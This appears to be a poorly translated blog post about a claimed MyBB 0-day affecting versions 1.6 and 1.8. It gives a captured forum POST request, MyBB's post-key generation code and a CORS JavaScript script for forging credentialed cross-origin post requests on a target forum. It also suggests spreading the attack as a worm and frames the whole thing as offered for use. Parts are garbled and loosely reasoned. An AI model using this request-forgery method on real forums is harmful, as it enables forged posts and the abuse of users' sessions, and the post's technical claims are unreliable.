MyBB 0-day vulnerability in well-known Forum Systems

MyBB 0-day vulnerability in well-known Forum Systems
MyBB is an excellent free forum software in the world. Its biggest feature is its simplicity, but its functionality is surprisingly powerful. Supports multiple languages. You can set the frontend and backend languages respectively. Each user can set the language in which he/she uses to access the Forum, including his/her own time zone. The custom function is powerful enough to avoid unexpected problems. Vulnerabilities affect multiple versions

Affected Versions: 1.6x & 1.8x test version: 1.8.3 (latest) and 1.6.16 (latest series 1.6)

Because of its strong influence, I began to play with MyBB and monitoring requests. During this period, I noticed something that is very likely to cause the vulnerability, these have been tested on multiple sites.

Test process

First, it is easy to damage MyBB. When you post a new post, it will request something. The following is an example of a post request from the Hackforums Forum:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1Host: www.hackforums.netUser-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.hackforums.net/newreply.php?tid=4602700Cookie: *Connection: keep-aliveContent-Type: multipart/form-data; boundary=------71842462512788Content-Length: 1588------71842462512788Content-Disposition: form-data; name="my_post_key"****** ------71842462512788 Content-Disposition: form-data; name="message_new" Hey dude, I love your site Omni. Can I get a free upgrade? ------71842462512788 Content-Disposition: form-data; name="message" Hey dude, I love your site Omni. Can I get a free upgrade? ------71842462512788 Content-Disposition: form-data; name="submit" Post Reply ------71842462512788 Content-Disposition: form-data; name="action" do_newreply ------71842462512788 Content-Disposition: form-data; name="replyto" ------71842462512788 Content-Disposition: form-data; name="posthash" ******------71842462512788Content-Disposition: form-data; name="attachmentaid"------71842462512788Content-Disposition: form-data; name="attachmentact"------71842462512788Content-Disposition: form-data; name="subject"*------71842462512788Content-Disposition: form-data; name="quoted_ids"------71842462512788Content-Disposition: form-data; name="tid"4602700------71842462512788--

For the MyBB system, we already know some of its fields. The first one is the post key. Without this field, we cannot send any post. It is very easy to get this key. We will explain it in detail later. Now we need to obtain posthash. posthash is only an MD5 string. You only need to create a valid MD5 string to bypass it. I can tell you that this is because of placeholders, but it is not something we will discuss today.

Staring at the message_new and message fields, MyBB will submit these two fields. However, it only displays the content in the message field, rather than the content in the message_new field. Therefore, you can write cocks in the message_new field of the previous post. Of course, you cannot see from the post what is different from the previous one.

How to generate a post key

The post key depends on the following functions:

functiongenerate_post_check() {global$mybb, $session;if($mybb->user['uid']){return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);}// Guests get a special stringelse{return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);}}

Then verify whether the post key calls the function:

functionverify_post_check($code, $silent=false) {global$lang;if(generate_post_check() != $code){if($silent == true){returnfalse;}else{if(defined("IN_ADMINCP")){returnfalse;}else{error($lang->invalid_post_code);}}}else{returntrue;}}

Then we can see that it is looking for the loginkey, salt, and regdate information. Now it is quite easy to get this information (I don't want to explain it too much, it's really easy) once we get the post key, as long as it is available and the user has not changed the password (currently, most Forum users rarely change the password frequently ).

Okay, so we can start the attack. First, we need to determine an attack target (I set up a website on the local machine), then I write a CORS script, and then the user clicks a URL in the browser to request the post content, after obtaining the request from the other end, the URL is processed but no message is prompted. Suppose you have constructed a valid request, and you will see the changes on the webpage.

How to Use

Different requests can be constructed based on different requirements. This can be used to submit posts and obtain Forum honors. If you want to make this vulnerability look like a worm, all you need to do is to reply to the post under the post (this requires more energy to get the post key). To be honest, this may be very high!

CORS code

Note: This is only the sample code from appsec-labs. You need to make some modifications to suit your attack targets:

// I suggest adding jQuery to top of file// You will have to modify the code to make it more useable as I won't be modifying it for you.var url = 'http://forum.mytarget.com/';$(document).ready(function() { corsMyBBPost();});functioncorsMyBBPost() {for(i=0; i<times; i++){cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);}}functioncors_send(method, url, data, credentials) {var cors;if (window.XDomainRequest){cors = new XDomainRequest();if (cors){cors.onprogress = function() { CORSstatus("Process") };cors.onload = function() { CORSresult(cors.responseText) };}elseCORSstatus("Browser does not support Cross Origin Request");}elseif (window.XMLHttpRequest){cors = new XMLHttpRequest();cors.onreadystatechange = function() {if (cors.readyState == 4)CORSresult(cors.getAllResponseHeaders(), cors.responseText);elseCORSstatus("Process");}}else{CORSstatus("Browser does not support AJAX");}method = method.toUpperCase();if (method == "POST" || method == "PUT")cors.open(method, url, data);elsecors.open(method, url);if (credentials)cors.withCredentials = "true";cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");cors.send(data);CORSstatus("Cross Origin Resource Sharing - Start");}functionCORSstatus(msg) { console.log(msg);}functionCORSerror(msg) { console.log("Oh shit..." + msg);}

Without any modification, the code is very concise. I will not describe how to steal the post key here. If you have any understanding, it is your own thing.

Finally, I hope you can learn more from it.

The most important thing is: Have fun!